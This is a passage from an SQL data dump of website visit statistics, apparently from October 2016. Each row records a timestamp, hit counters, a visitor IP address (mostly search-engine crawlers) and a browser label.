ther'),(67409,1476217266,1,0,1,0,'66.249.76.47',''),(67410,1476218062,1,1,0,0,'164.132.161.39','other'),(67411,1476218369,1,1,0,0,'163.172.66.94','other'),(67412,1476218408,2,0,2,0,'66.249.76.45',''),(67413,1476218426,1,0,1,0,'66.249.75.179',''),(67414,1476219676,1,1,0,0,'51.255.65.2','other'),(67415,1476220177,1,1,0,0,'66.102.9.27','other'),(67416,1476220606,1,1,0,0,'130.193.50.34','other'),(67417,1476220631,1,0,1,0,'66.249.76.47',''),(67418,1476220647,1,0,1,0,'66.249.75.183',''),(67419,1476221022,1,1,0,0,'51.255.65.84','other'),(67420,1476222109,1,0,1,0,'66.249.76.45',''),(67421,1476222345,1,1,0,0,'93.80.145.236','other'),(67422,1476222751,1,1,0,0,'163.172.66.64','other'),(67423,1476223057,1,1,0,0,'163.172.66.96','other'),(67424,1476223539,1,1,0,0,'66.102.9.29','other'),(67425,1476223628,1,0,1,0,'66.249.76.47',''),(67426,1476223655,1,1,0,0,'164.132.161.29','other'),(67427,1476223831,1,1,0,0,'163.172.65.15','other'),(67428,1476224115,1,0,1,0,'66.249.76.45',''),(67429,1476224419,1,1,0,0,'164.132.161.3','other'),(67430,1476224544,1,1,0,0,'164.132.161.60','other'),(67431,1476224874,1,1,0,0,'130.193.50.34','other'),(67432,1476225182,1,0,1,0,'66.249.76.47',''),(67433,1476225618,1,1,0,0,'163.172.66.150','other'),(67434,1476225805,1,1,0,0,'51.255.65.20','other'),(67435,1476225944,1,1,0,0,'51.255.65.51','other'),(67436,1476226440,1,1,0,0,'164.132.161.82','other'),(67437,1476226805,1,1,0,0,'163.172.65.236','other'),(67438,1476226994,1,1,0,0,'180.76.15.140','other'),(67439,1476227086,1,1,0,0,'66.102.9.27','other'),(67440,1476229596,1,1,0,0,'51.255.65.36','other'),(67441,1476230188,1,1,0,0,'163.172.66.83','other'),(67442,1476230685,1,1,0,0,'66.102.9.25','other'),(67443,1476231552,1,0,1,0,'66.249.76.45',''),(67444,1476232145,1,1,0,0,'51.255.65.17','other'),(67445,1476232299,1,1,0,0,'51.255.65.69','other'),(67446,1476233007,1,0,1,0,'66.249.76.79',''),(67447,1476233341,1,1,0,0,'40.77.167.7','other'),(67448,1476233385,1,1,0,0,'163.172.66.55','other'),(67449,1476233625,1,1,0,0,'51.255.65.87','other'),(67450,1476233737,1,0,1,0,'66.249.76.46',''),(67451,1476233916,2,2,0,0,'130.193.50.34','other'),(67452,1476234284,1,1,0,0,'66.102.9.29','other'),(67453,1476235560,1,0,1,0,'66.249.66.84',''),(67454,1476235800,2,2,0,0,'130.193.50.34','other'),(67455,1476236132,1,0,1,0,'66.249.66.81',''),(67456,1476236385,1,1,0,0,'163.172.66.142','other'),(67457,1476236682,1,0,1,0,'66.249.76.47',''),(67458,1476236856,1,1,0,0,'163.172.66.103','other'),(67459,1476237814,1,0,1,0,'66.249.66.81',''),(67460,1476237885,1,1,0,0,'66.102.9.25','other'),(67461,1476237987,1,1,0,0,'163.172.66.19','other'),(67462,1476238251,2,2,0,0,'130.193.50.34','other'),(67463,1476238273,1,1,0,0,'164.132.161.73','other'),(67464,1476238277,1,1,0,0,'157.55.39.38','other'),(67465,1476238296,1,0,1,0,'66.249.76.45',''),(67466,1476238663,1,0,1,0,'66.249.66.87',''),(67467,1476238730,1,1,0,0,'164.132.161.88','other'),(67468,1476239143,1,1,0,0,'141.8.183.25','other'),(67469,1476239255,1,1,0,0,'51.255.65.94','other'),(67470,1476239339,1,1,0,0,'66.249.66.177','chrome'),(67471,1476239416,1,1,0,0,'178.154.189.37','other'),(67472,1476239820,1,1,0,0,'207.46.13.102','other'),(67473,1476240477,1,0,1,0,'68.180.229.114',''),(67474,1476240512,1,0,1,0,'66.249.76.45',''),(67475,1476240527,1,1,0,0,'164.132.161.3','other'),(67476,1476240567,1,1,0,0,'164.132.161.42','other'),(67477,1476240652,1,1,0,0,'51.255.65.24','other'),(67478,1476240664,1,0,1,0,'66.249.76.77',''),(67479,1476241011,1,0,1,0,'66.249.66.87',''),(67480,1476241025,1,1,0,0,'130.193.50.34','other'),(67481,1476241378,1,0,1,0,'66.249.76.47',''),(67482,1476242099,1,1,0,0,'157.55.39.38','other'),(67483,1476242252,1,1,0,0,'66.102.9.27','other'),(67484,1476242328,1,0,1,0,'66.249.66.84',''),(67485,1476242371,2,0,2,0,'66.249.66.87',''),(67486,1476242393,1,1,0,0,'51.255.65.36','other'),(67487,1476242412,1,1,0,0,'164.132.161.39','other'),(67488,1476242806,1,1,0,0,'130.193.50.34','other'),(67489,1476243921,2,0,2,0,'66.249.76.46',''),(67490,1476244022,1,1,0,0,'163.172.65.56','other'),(67491,1476244198,2,0,2,0,'66.249.76.47',''),(67492,1476244558,1,1,0,0,'40.77.167.4','other'),(67493,1476245651,1,1,0,0,'164.132.161.49','other'),(67494,1476245966,1,0,1,0,'66.249.76.46',''),(67495,1476246163,1,0,1,0,'66.249.76.47',''),(67496,1476246304,1,1,0,0,'163.172.65.132','other'),(67497,1476246427,1,1,0,0,'163.172.65.225','other'),(67498,1476246804,1,1,0,0,'51.255.65.84','other'),(67499,1476247640,1,1,0,0,'40.77.167.7','other'),(67500,1476247924,1,0,1,0,'66.249.76.47',''),(67501,1476248398,1,1,0,0,'163.172.66.7','other'),(67502,1476248663,1,1,0,0,'130.193.50.34','other'),(67503,1476249714,1,1,0,0,'5.255.250.41','other'),(67504,1476249998,1,1,0,0,'164.132.161.59','other'),(67505,1476250164,1,1,0,0,'164.132.161.23','other'),(67506,1476250188,1,1,0,0,'207.46.13.102','other'),(67507,1476250206,1,1,0,0,'163.172.65.37','other'),(67508,1476250458,1,0,1,0,'66.249.66.87',''),(67509,1476250535,1,1,0,0,'91.196.178.69','firefox'),(67510,1476250539,1,0,1,0,'66.249.76.45',''),(67511,1476250883,1,0,1,0,'66.249.76.46',''),(67512,1476251334,1,0,1,0,'66.249.76.47',''),(67513,1476251415,1,0,1,0,'66.249.66.81',''),(67514,1476252395,1,1,0,0,'94.178.164.125','chrome'),(67515,1476252589,1,1,0,0,'51.255.65.49','other'),(67516,1476253203,1,1,0,0,'66.102.9.27','chrome'),(67517,1476253221,1,1,0,0,'51.255.65.89','other'),(67518,1476253855,1,0,1,0,'66.249.66.84',''),(67519,1476254423,2,0,2,0,'66.249.76.45',''),(67520,1476254680,1,1,0,0,'91.196.177.40','chrome'),(67521,1476255085,1,1,0,0,'51.255.65.7','other'),(67522,1476255356,1,1,0,0,'92.38.40.119','chrome'),(67523,1476255766,1,1,0,0,'180.76.15.160','other'),(67524,1476256047,1,0,1,0,'66.249.76.47',''),(67525,1476256252,1,0,1,0,'66.249.76.45',''),(67526,1476256315,1,1,0,0,'66.102.9.29','other'),(67527,1476256470,1,1,0,0,'163.172.64.177','other'),(67528,1476256708,2,0,2,0,'66.249.76.77',''),(67529,1476256898,1,1,0,0,'164.132.161.59','other'),(67530,1476257055,1,1,0,0,'95.133.1.60','chrome'),(67531,1476257070,1,1,0,0,'164.132.161.36','other'),(67532,1476257264,1,0,1,0,'66.249.76.79',''),(67533,1476257312,1,1,0,0,'94.231.190.81','chrome'),(67534,1476257662,1,1,0,0,'163.172.65.184','other'),(67535,1476257679,1,1,0,0,'94.179.13.6','chrome'),(67536,1476259685,1,1,0,0,'66.102.9.25','other'),(67537,1476259979,1,0,1,0,'66.249.76.47',''),(67538,1476260821,1,1,0,0,'212.111.209.80','firefox'),(67539,1476260840,1,0,1,0,'66.249.76.46',''),(67540,1476260902,1,0,1,0,'66.249.76.45',''),(67541,1476261192,1,1,0,0,'180.76.15.25','other'),(67542,1476261298,1,1,0,0,'91.196.178.72','chrome'),(67543,1476261365,1,0,1,0,'66.249.66.87',''),(67544,1476262507,1,1,0,0,'174.129.237.157','other'),(67545,1476262527,1,1,0,0,'91.196.178.136','chrome'),(67546,1476262711,1,1,0,0,'91.196.178.130','firefox'),(67547,1476263191,2,0,2,0,'66.249.76.45',''),(67548,1476263399,1,1,0,0,'66.102.9.27','other'),(67549,1476264180,1,1,0,0,'91.196.177.40','chrome'),(67550,1476264790,1,1,0,0,'163.172.65.131','other'),(67551,1476264869,1,0,1,0,'66.249.76.77',''),(67552,1476264967,1,0,1,0,'66.249.66.84',''),(67553,1476266020,1,0,1,0,'66.249.66.84',''),(67554,1476266061,1,1,0,0,'51.255.65.85','other'),(67555,1476266512,1,1,0,0,'51.255.65.15','other'),(67556,1476266807,1,1,0,0,'66.102.9.29','other'),(67557,1476267138,1,1,0,0,'91.196.178.72','chrome'),(67558,1476267364,1,0,1,0,'66.249.76.47',''),(67559,1476267535,1,0,1,0,'68.180.229.114',''),(67560,1476267666,1,1,0,0,'130.193.50.32','other'),(67561,1476267671,1,1,0,0,'141.8.142.78','other'),(67562,1476269099,2,2,0,0,'91.196.178.70','firefox'),(67563,1476269484,1,1,0,0,'94.178.164.125','chrome'),(67564,1476269656,1,0,1,0,'66.249.66.183',''),(67565,1476269878,1,0,1,0,'66.249.66.84',''),(67566,1476270507,1,1,0,0,'164.132.161.2','other'),(67567,1476270573,1,1,0,0,'66.102.9.27','other'),(67568,1476271428,1,1,0,0,'88.198.16.12','other'),(67569,1476271544,1,1,0,0,'163.172.66.2','other'),(67570,1476272170,1,1,0,0,'91.196.178.72','chrome'),(67571,1476272615,1,1,0,0,'37.55.59.1','chrome'),(67572,1476272643,1,0,1,0,'66.249.76.47',''),(67573,1476272664,1,0,1,0,'66.249.66.183',''),(67574,1476273165,1,1,0,0,'91.196.178.71','chrome'),(67575,1476274100,1,1,0,0,'66.102.9.29','other'),(67576,1476274647,1,1,0,0,'31.43.30.178','chrome'),(67577,1476275122,2,0,2,0,'66.249.76.46',''),(67578,1476275123,2,0,2,0,'66.249.76.45',''),(67579,1476275320,1,1,0,0,'51.255.65.13','other'),(67580,1476275572,3,3,0,0,'91.196.178.69','firefox'),(67581,1476275859,1,1,0,0,'40.77.167.7','other'),(67582,1476276734,1,1,0,0,'163.172.66.32','other'),(67583,1476276895,1,1,0,0,'51.255.65.90','other'),(67584,1476276943,1,1,0,0,'163.172.64.243','other'),(67585,1476277072,1,1,0,0,'130.193.51.19','other'),(67586,1476277118,1,1,0,0,'183.182.97.133','other'),(67587,1476277274,1,1,0,0,'91.196.178.66','firefox'),(67588,1476277307,2,0,2,0,'66.249.76.47',''),(67589,1476277325,1,1,0,0,'163.172.64.177','other'),(67590,1476277589,1,0,1,0,'66.249.76.46',''),(67591,1476277753,1,1,0,0,'66.102.9.25','other'),(67592,1476278131,1,0,1,0,'66.249.66.84',''),(67593,1476278221,1,1,0,0,'91.196.178.69','firefox'),(67594,1476278474,1,1,0,0,'91.196.178.164','firefox'),(67595,1476278487,1,1,0,0,'51.255.65.83','other'),(67596,1476278518,1,1,0,0,'180.76.15.28','other'),(67597,1476279229,2,0,2,0,'66.249.76.47',''),(67598,1476279327,1,1,0,0,'91.196.178.66','firefox'),(67599,1476279445,1,1,0,0,'91.196.178.66','chrome'),(67600,1476280037,1,1,0,0,'51.255.65.63','other'),(67601,1476280846,2,0,2,0,'66.249.76.45',''),(67602,1476280889,1,1,0,0,'94.179.103.229','chrome'),(67603,1476281066,1,1,0,0,'51.255.65.37','other'),(67604,1476281104,1,1,0,0,'164.132.161.40','other'),(67605,1476281176,1,1,0,0,'130.193.50.34','other'),(67606,1476281261,1,1,0,0,'66.102.9.29','other'),(67607,1476281457,1,1,0,0,'163.172.66.110','other'),(67608,1476281485,1,1,0,0,'164.132.161.72','other'),(67609,1476281616,1,1,0,0,'91.196.178.37','chrome'),(67610,1476282638,1,1,0,0,'163.172.66.107','other'),(67611,1476283214,1,1,0,0,'164.132.161.34','other'),(67612,1476283752,2,0,2,0,'66.249.66.84',''),(67613,1476283855,1,0,1,0,'66.249.76.45',''),(67614,1476284319,1,0,1,0,'66.249.66.81',''),(67615,1476284869,1,1,0,0,'51.254.97.23','other'),(67616,1476284934,1,1,0,0,'66.102.9.29','other'),(67617,1476284935,1,1,0,0,'141.8.183.25','other'),(67618,1476285500,1,0,1,0,'66.249.76.47',''),(67619,1476286013,1,1,0,0,'109.63.204.91','other'),(67620,1476286232,1,1,0,0,'51.255.65.64','other'),(67621,1476286310,1,0,1,0,'66.249.66.84',''),(67622,1476286759,1,1,0,0,'163.172.66.107','other'),(67623,1476287599,1,0,1,0,'66.249.66.87',''),(67624,1476287806,1,1,0,0,'164.132.161.21','other'),(67625,1476287951,1,1,0,0,'51.255.65.97','other'),(67626,1476288490,1,1,0,0,'180.76.15.136','other'),(67627,1476288493,1,1,0,0,'66.102.9.27','other'),(67628,1476288573,1,0,1,0,'66.249.76.47',''),(67629,1476288662,1,0,1,0,'66.249.76.45',''),(67630,1476288927,1,0,1,0,'66.249.66.180',''),(67631,1476289055,1,1,0,0,'94.178.147.18','firefox'),(67632,1476290931,1,1,0,0,'40.77.167.7','other'),(67633,1476291130,1,0,1,0,'66.249.76.46',''),(67634,1476291211,2,2,0,0,'66.249.76.77','chrome'),(67635,1476291241,1,1,0,0,'130.193.50.34','other'),(67636,1476291295,2,0,2,0,'66.249.76.45',''),(67637,1476291673,1,1,0,0,'163.172.66.81','other'),(67638,1476291908,1,1,0,0,'164.132.161.90','other'),(67639,1476291909,1,1,0,0,'66.102.9.27','other'),(67640,1476292545,1,1,0,0,'91.196.179.249','chrome'),(67641,1476292625,1,1,0,0,'164.132.161.76','other'),(67642,1476293057,1,0,1,0,'66.249.66.87',''),(67643,1476295199,1,1,0,0,'40.77.167.4','other'),(67644,1476295436,1,0,1,0,'66.249.76.46',''),(67645,1476295717,1,1,0,0,'66.102.9.27','other'),(67646,1476295908,1,0,1,0,'66.249.76.47',''),(67647,1476296711,1,0,1,0,'66.249.66.81',''),(67648,1476297211,1,1,0,0,'51.255.65.73','other'),(67649,1476298371,1,0,1,0,'66.249.76.45',''),(67650,1476298751,1,1,0,0,'164.132.161.80','other'),(67651,1476298766,1,1,0,0,'51.255.65.47','other'),(67652,1476298957,1,1,0,0,'51.255.65.28','other'),(67653,1476299239,1,1,0,0,'66.102.9.25','other'),(67654,1476299259,1,1,0,0,'51.255.65.32','other'),(67655,1476299295,1,0,1,0,'66.249.76.45',''),(67656,1476299677,1,1,0,0,'207.46.13.102','other'),(67657,1476299940,1,1,0,0,'164.132.161.13','other'),(67658,1476300391,1,1,0,0,'163.172.66.59','other'),(67659,1476300916,1,1,0,0,'164.132.161.85','other'),(67660,1476301037,1,1,0,0,'163.172.66.148','other'),(67661,1476301168,1,1,0,0,'51.255.65.58','other'),(67662,1476301548,2,2,0,0,'141.8.183.25','other'),(67663,1476301568,1,1,0,0,'141.8.142.61','other'),(67664,1476302699,1,1,0,0,'66.102.9.29','other'),(67665,1476302704,1,1,0,0,'51.255.65.6','other'),(67666,1476303444,1,1,0,0,'51.255.65.56','other'),(67667,1476303728,1,0,1,0,'66.249.66.81',''),(67668,1476303890,1,0,1,0,'66.249.76.46',''),(67669,1476304200,1,1,0,0,'91.196.178.163','chrome'),(67670,1476304285,1,1,0,0,'164.132.161.91','other'),(67671,1476304395,1,1,0,0,'51.255.65.93','other'),(67672,1476304561,1,1,0,0,'164.132.161.54','other'),(67673,1476304661,1,1,0,0,'51.255.65.70','other'),(67674,1476304794,1,1,0,0,'51.255.65.26','other'),(67675,1476305031,1,1,0,0,'164.132.161.92','other'),(67676,1476305228,1,1,0,0,'51.255.65.52','other'),(67677,1476305746,1,0,1,0,'68.180.229.114',''),(67678,1476307038,1,1,0,0,'66.102.9.27','other'),(67679,1476307229,1,0,1,0,'66.249.76.46',''),(67680,1476307826,1,1,0,0,'163.172.64.184','other'),(67681,1476308459,1,1,0,0,'176.195.161.95','other'),(67682,1476309256,2,0,2,0,'66.249.76.46',''),(67683,1476309292,2,0,2,0,'66.249.76.45',''),(67684,1476309370,1,1,0,0,'176.195.109.211','msie'),(67685,1476309399,1,1,0,0,'164.132.161.59','other'),(67686,1476309447,1,1,0,0,'51.255.65.87','other'),(67687,1476310281,1,0,1,0,'66.249.76.47',''),(67688,1476310888,1,1,0,0,'51.255.65.68','other'),(67689,1476310971,1,1,0,0,'164.132.161.51','other'),(67690,1476311129,1,1,0,0,'66.102.9.27','other'),(67691,1476311143,1,1,0,0,'163.172.65.32','other'),(67692,1476311649,1,0,1,0,'66.249.76.45',''),(67693,1476312157,1,1,0,0,'163.172.65.248','other'),(67694,1476312583,1,1,0,0,'174.129.237.157','other'),(67695,1476312835,1,1,0,0,'164.132.161.7','other'),(67696,1476313094,2,0,2,0,'66.249.76.47',''),(67697,1476313755,1,1,0,0,'163.172.65.15','other'),(67698,1476313921,1,1,0,0,'164.132.161.92','other'),(67699,1476313942,1,1,0,0,'164.132.161.34','other'),(67700,1476313957,1,1,0,0,'66.102.9.27','other'),(67701,1476314669,1,0,1,0,'66.249.76.47',''),(67702,1476314875,1,1,0,0,'51.255.65.54','other'),(67703,1476314894,1,1,0,0,'164.132.161.91','other'),(67704,1476315096,1,1,0,0,'163.172.66.153','other'),(67705,1476315191,1,1,0,0,'51.255.65.56','other'),(67706,1476316561,1,1,0,0,'51.255.65.6','other'),(67707,1476317050,1,1,0,0,'164.132.161.63','other'),(67708,1476317084,1,1,0,0,'66.102.9.27','other'),(67709,1476317295,1,1,0,0,'51.255.65.76','other'),(67710,1476317733,1,0,1,0,'66.249.76.45',''),(67711,1476318247,1,1,0,0,'130.193.50.34','other'),(67712,1476319276,1,1,0,0,'164.132.161.52','other'),(67713,1476319467,1,0,1,0,'66.249.76.46',''),(67714,1476319475,1,0,1,0,'66.249.76.79',''),(67715,1476319871,1,0,1,0,'66.249.76.45',''),(67716,1476320019,1,1,0,0,'163.172.66.49','other'),(67717,1476320188,1,0,1,0,'66.249.66.84',''),(67718,1476320336,1,1,0,0,'164.132.161.54','other'),(67719,1476320735,1,1,0,0,'66.102.9.25','other'),(67720,1476321469,1,1,0,0,'40.77.167.7','other'),(67721,1476322597,1,0,1,0,'66.249.66.81',''),(67722,1476323598,1,1,0,0,'164.132.161.64','other'),(67723,1476323849,1,1,0,0,'163.172.65.114','other'),(67724,1476323882,1,1,0,0,'51.255.65.36','other'),(67725,1476324285,1,1,0,0,'66.102.9.27','other'),(67726,1476324297,1,0,1,0,'66.249.66.84',''),(67727,1476324879,1,1,0,0,'51.255.65.70','other'),(67728,1476326127,1,0,1,0,'66.249.76.45',''),(67729,1476326583,1,1,0,0,'130.193.51.19','other'),(67730,1476326585,1,1,0,0,'164.132.161.88','other'),(67731,1476327018,1,1,0,0,'5.32.182.124','chrome'),(67732,1476327688,1,1,0,0,'66.249.76.79','chrome'),(67733,1476327796,1,1,0,0,'66.249.76.47','chrome'),(67734,1476327957,1,1,0,0,'66.249.76.46','chrome'),(67735,1476328242,1,1,0,0,'66.102.9.25','other'),(67736,1476328611,1,0,1,0,'66.249.76.45',''),(67737,1476328867,1,1,0,0,'163.172.65.222','other'),(67738,1476329078,1,1,0,0,'51.255.65.37','other'),(67739,1476329316,1,1,0,0,'164.132.161.60','other'),(67740,1476329431,1,1,0,0,'66.249.76.46','chrome'),(67741,1476330106,1,1,0,0,'46.185.43.126','chrome'),(67742,1476330115,1,1,0,0,'163.172.66.158','other'),(67743,1476330163,1,0,1,0,'66.249.66.87',''),(67744,1476330550,1,1,0,0,'51.255.65.29','other'),(67745,1476331009,1,1,0,0,'163.172.65.183','other'),(67746,1476331153,1,1,0,0,'130.193.50.34','other'),(67747,1476331577,1,1,0,0,'51.255.65.37','other'),(67748,1476331621,1,1,0,0,'82.145.221.171','other'),(67749,1476332396,1,1,0,0,'66.102.9.25','other'),(67750,1476332462,1,1,0,0,'91.196.178.71','chrome'),(67751,1476332747,1,0,1,0,'66.249.76.47',''),(67752,1476332859,1,1,0,0,'51.255.65.26','other'),(67753,1476333441,1,1,0,0,'180.76.15.21','other'),(67754,1476333771,1,1,0,0,'141.8.142.61','other'),(67755,1476333903,1,1,0,0,'163.172.64.182','other'),(67756,1476334045,1,1,0,0,'164.132.161.16','other'),(67757,1476334349,1,1,0,0,'130.193.51.19','other'),(67758,1476334457,1,1,0,0,'130.193.50.34','other'),(67759,1476334510,1,1,0,0,'141.8.183.25','other'),(67760,1476334521,1,1,0,0,'163.172.65.15','other'),(67761,1476334797,2,0,2,0,'66.249.76.45',''),(67762,1476334821,1,0,1,0,'66.249.76.77',''),(67763,1476334848,1,0,1,0,'66.249.76.46',''),(67764,1476335382,1,1,0,0,'66.102.9.27','other'),(67765,1476335441,1,1,0,0,'207.46.13.103','other'),(67766,1476335632,1,1,0,0,'180.76.15.24','other'),(67767,1476335780,1,1,0,0,'51.255.65.2','other'),(67768,1476336229,1,1,0,0,'163.172.64.193','other'),(67769,1476336293,1,1,0,0,'163.172.66.131','other'),(67770,1476337454,1,0,1,0,'66.249.76.47',''),(67771,1476337457,1,1,0,0,'91.196.178.69','firefox'),(67772,1476337703,1,1,0,0,'91.192.132.242','firefox'),(67773,1476337888,1,0,1,0,'66.249.76.46',''),(67774,1476338455,1,1,0,0,'66.102.9.27','chrome'),(67775,1476338623,1,1,0,0,'163.172.65.8','other'),(67776,1476338663,1,1,0,0,'91.192.132.242','firefox'),(67777,1476338835,1,1,0,0,'91.196.178.72','chrome'),(67778,1476339053,1,1,0,0,'66.102.9.25','other'),(67779,1476339064,1,1,0,0,'163.172.64.247','other'),(67780,1476339222,1,1,0,0,'141.8.183.25','other'),(67781,1476339840,1,1,0,0,'51.255.65.23','other'),(67782,1476340050,1,1,0,0,'164.132.161.27','other'),(67783,1476340183,1,1,0,0,'51.255.65.84','other'),(67784,1476340267,1,1,0,0,'163.172.65.240','other'),(67785,1476340516,1,1,0,0,'46.211.112.114','chrome'),(67786,1476340650,1,1,0,0,'164.132.161.91','other'),(67787,1476340715,1,0,1,0,'66.249.76.46',''),(67788,1476340742,1,0,1,0,'66.249.66.84',''),(67789,1476341669,1,0,1,0,'66.249.76.46',''),(67790,1476342209,1,1,0,0,'46.201.52.121','chrome'),(67791,1476342290,1,1,0,0,'66.102.9.29','other'),(67792,1476342563,1,1,0,0,'176.195.103.253','msie'),(67793,1476342783,1,1,0,0,'207.46.13.155','other'),(67794,1476343691,1,0,1,0,'66.249.66.84',''),(67795,1476343747,1,1,0,0,'164.132.161.47','other'),(67796,1476343833,2,0,2,0,'66.249.76.47',''),(67797,1476344092,1,1,0,0,'164.132.161.30','other'),(67798,1476344464,1,1,0,0,'163.172.66.162','other'),(67799,1476345070,1,1,0,0,'163.172.65.231','other'),(67800,1476345885,1,1,0,0,'66.102.9.29','other'),(67801,1476345971,1,1,0,0,'82.207.91.234','firefox'),(67802,1476346315,1,0,1,0,'66.249.76.47',''),(67803,1476347078,1,1,0,0,'164.132.161.91','other'),(67804,1476347444,1,0,1,0,'66.249.66.81',''),(67805,1476349221,1,1,0,0,'164.132.161.42','other'),(67806,1476349498,1,1,0,0,'164.132.161.3','other'),(67807,1476349586,1,0,1,0,'66.249.76.47',''),(67808,1476349770,1,1,0,0,'164.132.161.88','other'),(67809,1476350099,1,1,0,0,'51.255.65.78','other'),(67810,1476350415,1,1,0,0,'163.172.65.17','other'),(67811,1476351167,1,1,0,0,'162.210.196.129','other'),(67812,1476351394,1,0,1,0,'66.249.66.183',''),(67813,1476351775,1,1,0,0,'163.172.66.87','other'),(67814,1476351919,1,1,0,0,'164.132.161.58','other'),(67815,1476352061,1,1,0,0,'31.43.27.57','chrome'),(67816,1476352349,1,1,0,0,'195.91.224.113','other'),(67817,1476353024,1,1,0,0,'164.132.161.48','other'),(67818,1476353543,1,1,0,0,'141.8.142.58','other'),(67819,1476353570,1,1,0,0,'141.8.132.10','other'),(67820,1476353603,4,4,0,0,'141.8.183.25','other'),(67821,1476353707,1,1,0,0,'163.172.66.148','other'),(67822,1476353723,1,1,0,0,'130.193.51.19','other'),(67823,1476353829,2,2,0,0,'130.193.50.34','other'),(67824,1476354829,1,1,0,0,'130.193.50.34','other'),(67825,1476356085,1,1,0,0,'91.196.178.70','firefox'),(67826,1476356208,1,0,1,0,'66.249.76.45',''),(67827,1476356796,1,0,1,0,'66.249.76.47',''),(67828,1476357491,1,0,1,0,'66.249.66.84',''),(67829,1476357590,1,1,0,0,'91.196.178.70','firefox'),(67830,1476357681,1,1,0,0,'163.172.64.251','other'),(67831,1476358210,1,1,0,0,'163.172.65.112','other'),(67832,1476358255,1,1,0,0,'51.255.65.64','other'),(67833,1476358278,1,1,0,0,'163.172.66.16','other'),(67834,1476358529,1,1,0,0,'164.132.161.23','other'),(67835,1476359182,1,0,1,0,'66.249.76.45',''),(67836,1476359705,1,1,0,0,'51.255.65.52','other'),(67837,1476360470,1,1,0,0,'164.132.161.4','other'),(67838,1476360980,2,2,0,0,'130.193.50.34','other'),(67839,1476361825,1,0,1,0,'66.249.66.84',''),(67840,1476361910,1,0,1,0,'66.249.76.47',''),(67841,1476362033,1,1,0,0,'164.132.161.21','other'),(67842,1476363413,1,1,0,0,'51.255.65.21','other'),(67843,1476363451,1,0,1,0,'66.249.76.46',''),(67844,1476363847,2,2,0,0,'141.8.183.25','other'),(67845,1476363884,1,1,0,0,'66.102.9.27','other'),(67846,1476364477,1,1,0,0,'164.132.161.42','other'),(67847,1476364672,1,1,0,0,'164.132.161.91','other'),(67848,1476365028,1,1,0,0,'217.69.136.203','other'),(67849,1476365287,1,1,0,0,'195.49.151.89','chrome'),(67850,1476365301,1,1,0,0,'163.172.64.223','other'),(67851,1476365566,1,1,0,0,'163.172.66.170','other'),(67852,1476365693,2,2,0,0,'130.193.50.34','other'),(67853,1476365815,1,1,0,0,'163.172.66.31','other'),(67854,1476365837,1,1,0,0,'91.196.178.67','chrome'),(67855,1476366568,1,1,0,0,'163.172.66.180','other'),(67856,1476366808,1,1,0,0,'207.46.13.103','other'),(67857,1476367084,1,1,0,0,'51.255.65.57','other'),(67858,1476367193,1,0,1,0,'66.249.76.46',''),(67859,1476367483,1,1,0,0,'66.102.9.25','other'),(67860,1476367495,1,1,0,0,'164.132.161.10','other'),(67861,1476367655,1,1,0,0,'37.53.228.29','chrome'),(67862,1476368545,1,1,0,0,'163.172.64.224','other'),(67863,1476368906,1,1,0,0,'180.76.15.23','other'),(67864,1476368956,1,1,0,0,'163.172.66.10','other'),(67865,1476369510,1,1,0,0,'163.172.66.178','other'),(67866,1476369535,1,1,0,0,'46.133.32.162','chrome'),(67867,1476370323,1,1,0,0,'51.255.65.27','other'),(67868,1476370908,2,2,0,0,'130.193.50.34','other'),(67869,1476370985,1,0,1,0,'66.249.66.84',''),(67870,1476371084,1,1,0,0,'66.102.9.25','other'),(67871,1476371324,1,1,0,0,'163.172.66.167','other'),(67872,1476371641,1,1,0,0,'163.172.66.55','other'),(67873,1476371930,1,1,0,0,'130.193.50.34','other'),(67874,1476372012,1,1,0,0,'163.172.64.183','other'),(67875,1476372019,1,1,0,0,'66.249.66.87','chrome'),(67876,1476372412,1,0,1,0,'66.249.76.46',''),(67877,1476372428,1,0,1,0,'66.249.66.177',''),(67878,1476372583,1,1,0,0,'163.172.65.110','other'),(67879,1476372622,1,1,0,0,'164.132.161.49','other'),(67880,1476372775,1,1,0,0,'164.132.161.93','other'),(67881,1476373281,2,2,0,0,'130.193.50.34','other'),(67882,1476374060,1,1,0,0,'163.172.66.141','other'),(67883,1476374295,1,0,1,0,'66.249.76.47',''),(67885,1476374399,1,1,0,0,'91.196.178.167','firefox'),(67886,1476374402,1,0,1,0,'66.249.76.45',''),(67887,1476374413,1,1,0,0,'94.178.147.18','firefox'),(67888,1476374426,1,0,1,0,'66.249.76.77',''),(67889,1476374502,1,0,1,0,'66.249.76.46',''),(67890,1476374685,1,1,0,0,'66.102.9.25','other'),(67891,1476374849,1,0,1,0,'68.180.229.114',''),(67892,1476374929,1,1,0,0,'40.77.167.4','other'),(67893,1476374940,1,1,0,0,'130.193.50.34','other'),(67894,1476375399,1,1,0,0,'141.8.183.25','other'),(67895,1476375819,1,0,1,0,'66.249.66.81',''),(67896,1476376046,1,1,0,0,'207.46.13.155','other'),(67897,1476376473,1,1,0,0,'51.255.65.71','other'),(67898,1476377353,1,1,0,0,'94.178.147.18','firefox'),(67899,1476377396,1,1,0,0,'91.196.178.68','firefox'),(67900,1476377701,5,5,0,0,'141.8.183.25','other'),(67901,1476377913,1,0,1,0,'68.180.229.114',''),(67902,1476377918,2,2,0,0,'130.193.50.34','other'),(67903,1476378209,1,0,1,0,'66.249.76.81',''),(67904,1476378213,1,0,1,0,'66.249.66.180',''),(67905,1476378305,1,1,0,0,'51.255.65.4','other'),(67906,1476378353,1,0,1,0,'66.249.76.46',''),(67907,1476378643,1,1,0,0,'163.172.65.189','other'),(67908,1476378651,1,1,0,0,'164.132.161.38','other'),(67909,1476378758,1,1,0,0,'163.172.66.52','other'),(67910,1476378766,1,1,0,0,'195.20.154.70','chrome'),(67911,1476379542,2,2,0,0,'141.8.183.25','other'),(67912,1476379806,1,1,0,0,'51.255.65.80','other'),(67913,1476380220,2,0,2,0,'66.249.76.77',''),(67914,1476380558,1,1,0,0,'141.8.183.25','other'),(67915,1476380711,1,1,0,0,'130.193.51.19','other'),(67916,1476380913,1,0,1,0,'66.249.66.171',''),(67917,1476381883,1,1,0,0,'66.102.9.25','other'),(67918,1476382375,1,1,0,0,'163.172.64.233','other'),(67919,1476382649,2,2,0,0,'162.210.196.130','other'),(67920,1476382882,1,1,0,0,'51.255.65.94','other'),(67921,1476383149,2,0,2,0,'66.249.76.60',''),(67922,1476383797,5,5,0,0,'130.193.50.34','other'),(67923,1476385223,1,1,0,0,'157.55.39.135','other'),(67924,1476385238,1,0,1,0,'66.249.76.81',''),(67925,1476385484,1,1,0,0,'66.102.9.27','other'),(67926,1476386247,1,1,0,0,'51.255.65.63','other'),(67927,1476386727,1,1,0,0,'